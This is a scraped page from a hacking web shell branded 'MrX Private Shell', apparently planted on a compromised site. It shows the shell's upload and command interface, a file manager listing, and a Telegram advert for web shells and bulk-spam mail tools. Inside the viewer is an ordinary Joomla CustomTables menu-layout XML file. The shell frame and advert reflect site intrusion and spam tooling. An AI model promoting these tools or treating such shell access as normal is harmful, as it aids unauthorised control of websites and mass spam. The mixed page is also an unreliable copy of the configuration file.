__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?xml version="1.0" encoding="utf-8"?>
<metadata>
    <layout title="Record Details">
        <message>Generate details view of a single record.
        </message>
    </layout>

    <name>Record Details</name>
    <description>CustomTables - Record Details</description>

    <fields
            name="params"
            addfieldpath="/components/com_customtables/fields"
    >
        <fieldset name="PARAMS">

            <field type="CTTable" name="establename" default="" label="Table" description="Select Table"/>

            <field type="CTDetailsLayout" name="esdetailslayout" default="" label="Details Layout"
                   description="Select Details Layout"/>

            <field type="CTEditLayout" name="eseditlayout" default="" label="Edit Layout"
                   description="Select Edit Layout"/>

        </fieldset>

        <fieldset name="FILTERS">
            <field type="text" name="filter" filter="raw" default="" label="Search Parameter"
                   description="
		field to search in = (or &#60; or &#60;= or &#62; or &#62;= or != and == 'exact match')
		value (or Twig tag as {{ user.id }} for example ) to have more then one equation use AND, OR
		to get value from the URL query add '$get_' to parameter name, example 'username=$get_user' this will read value 'user' from url query.
To get current date use {{ 'now'|date('m/d/Y') }} or {{ 'now'|date('Y') }} for the year or {{ 'now'|date('m') }} for the month. Also you can format the date using MySql date_format() format specifiers, example 1: {now:%m}.
Example 2: 'birthdate:%m%d DESC' to get the month and the day of the field value.
"/>
            <field type="list" name="showpublished" default="0" label="Show published records" description="">
                <option value="0">Show Published Only</option>
                <option value="1">Show Unpublished Only</option>
                <option value="2">Show Any</option>
            </field>

            <field type="text" name="useridfield" default="" label="COM_CUSTOMTABLES_MENU_CUSTOM_USERID_FIELD"
                   description="
User type field name - to check if a record belongs to a current user. The table must contain the user type field.
There is the option to find out if a record belongs to a current user through parent tables.
Syntax example: 'user or parents(children).user'.
In this case, there will be two checks: the first one will check if the record belongs to the current user and the second one will check if the record belongs to any parent record
 that belongs to the current user. At least one check must be positive."/>

            <field type="text" name="recordstable" default="" label="User Join Table"
                   description="Table that contains records user ids"/>
            <field type="text" name="recordsuseridfield" default="" label="User Join User ID Field"
                   description="Field that contains user id"/>
            <field type="text" name="recordsfield" default="" label="User Join Field"
                   description="Field that contains records user ids"/>

            <field type="text" name="sortby" default="" label="Default sort by field"
                   description="Type field name to sort by and the order. Example 1: title desc Example 2: title asc. Note that keyword asc is not necessary."/>
            <field type="text" name="forcesortby" default="" label="Forced sort by field"
                   description="Type field name to sort by and the order. Example 1: title desc Example 2: title asc. Note that keyword asc is not necessary. Also, you may add MySql date_format() format specifiers. Example: 'birthdate:%m%d DESC' to sort by month and day. You can also use _id to sort by recird ID or _published to sort by Publish State"/>

        </fieldset>

        <fieldset
                name="ctpermissions"
                label="JCONFIG_PERMISSIONS_LABEL"
        >
            <field type="list" name="guestcanaddnew" default="0" label="Guest can add new records" description="">
                <option value="1">Guest can add new records</option>
                <option value="0">Only registered can add new records</option>
                <option value="-1">Disable Add New records</option>
            </field>


            <field name="addusergroups" type="CTUserGroup" default="8" label="Who may add content"
                   description="Select a user group that may add the records."/>
            <field name="editusergroups" type="CTUserGroup" default="8" label="Who may edit content"
                   description="Select a user group that may edit records."/>
            <!--<field name="publishusergroups" type="CTUserGroup" default="8" label="Who may publish records (Admin)"
                   description="Select a user group that may publish/unpublish records."/>
            <field name="deleteusergroups" type="CTUserGroup" default="8" label="Who may delete records"
                   description="Select a user group that may delete records."/>-->

            <field type="list" name="publishstatus" default="1" label="Publish Record" description="">
                <option value="1">Published</option>
                <option value="0">Not Published</option>
            </field>

            <!--
            description="JCONFIG_PERMISSIONS_DESC"
                        <field name="asset_id" type="hidden" filter="unset"/>
                        <field
                                name="rules"
                                type="rules"
                                label="JCONFIG_PERMISSIONS_LABEL"
                                class="inputbox"
                                validate="rules"
                                filter="rules"
                                component="com_customtables"
                                section="catalog"
                        />-->

        </fieldset>

        <fieldset
                name="SaveRecordAction"
                label="Save Action"
                description="Save Record Action."
        >
            <field type="text" name="returnto" default="" size="70" label="Custom Return To"
                   description="Visitor will be redirected to this link when form is completed. Active value (may include value(s) of field(s) use [fieldname] to get the value) "/>

            <field type="text" name="msgitemissaved" default="" size="70" label="Record Saved Message"
                   description="This message will show up on the record being saved."/>

            <field type="text" name="requiredlabel" filter="raw" default="" size="70" label="Required Label"
                   description="Character or a text to show next to required field if there is one."/>

        </fieldset>

        <fieldset
                name="email"
                label="Email Notification"
                description="Send email notification(s) after record has been added or edited."
        >
            <field type="CTEmailLayout" name="onrecordaddsendemaillayout" default="" label="Email Message Layout"
                   description="Choose the layout type for the email message body creation."/>

            <field type="list" name="onrecordaddsendemail" default="0" label="Send Email Under Conditions"
                   description="Specify the condition for sending emails. For instance, contact forms may need to be sent when a website visitor adds a record. Note: Changes in the published status count as editing.">
                <option value="1">When a record is added</option>
                <option value="2">When a record is saved</option>
                <option value="3">Based on specific conditions (Works on refresh too)</option>
                <option value="0">Do not send</option>
            </field>

            <field type="text" name="onrecordaddsendemailto" default="" size="1024"
                   label="Send Email When Record is Added To:"
                   description="Enter the recipient email addresses for notifications when a record is added. Separate multiple emails with a comma.

            To set a custom subject for an email, append the colon ':' after the email address, followed by the desired subject.

            You can also utilize field values from the added record by using Twig tags.

            Example 1: {{ email }}
            Example 2: [email protected], [email protected], {{ email }}: My Test Email
            Example 3: {{ customeremail }}: Thank you {{ name }} for your participation.
"/>

            <field type="text" name="onrecordsavesendemailto" default="" size="1024"
                   label="Send Email When Record is Saved To:"
                   description="Enter the recipient email addresses for notifications when a record is saved or refreshed. Separate multiple emails with a comma.

            To set a custom subject for an email, append the colon ':' after the email address, followed by the desired subject.

            You can also utilize field values from the saved record by using Twig tags.

            Example 1: {{ email }}
            Example 2: [email protected], [email protected], {{ email }}: My Test Email
            Example 3: {{ customeremail }}: Thank you {{ name }} for your participation.
"/>

            <field type="text" name="sendemailcondition" default="" size="50" label="Conditions for Sending Email"
                   description="Specify conditions for triggering the 'Record Saved' event. For example (using PHP syntax): 'approved=1 OR name=='Mark'"/>

            <field type="string" name="emailsentstatusfield" default="" label="Field for Email Sent Status"
                   description="Designate a field to track the status of email sending. This field should be of type 'integer' or 'checkbox'. '1' represents sent, '0' represents not sent."/>
        </fieldset>

        <fieldset name="Advanced" label="Advanced">
            <field type="text" name="listingid" default="" size="70" label="Custom Listing ID" description=""/>
            <field type="radio" name="allowcontentplugins" default="0" label="Allow Content Plugins"
                   description="Let content plugins parse output content." class="btn-group btn-group-yesno">
                <option value="1">Yes</option>
                <option value="0">No</option>
            </field>
        </fieldset>
    </fields>
</metadata>

Filemanager

Name Type Size Permission Actions
default.php File 2.14 KB 0664
default.xml File 10.32 KB 0664
index.html File 43 B 0664
Filemanager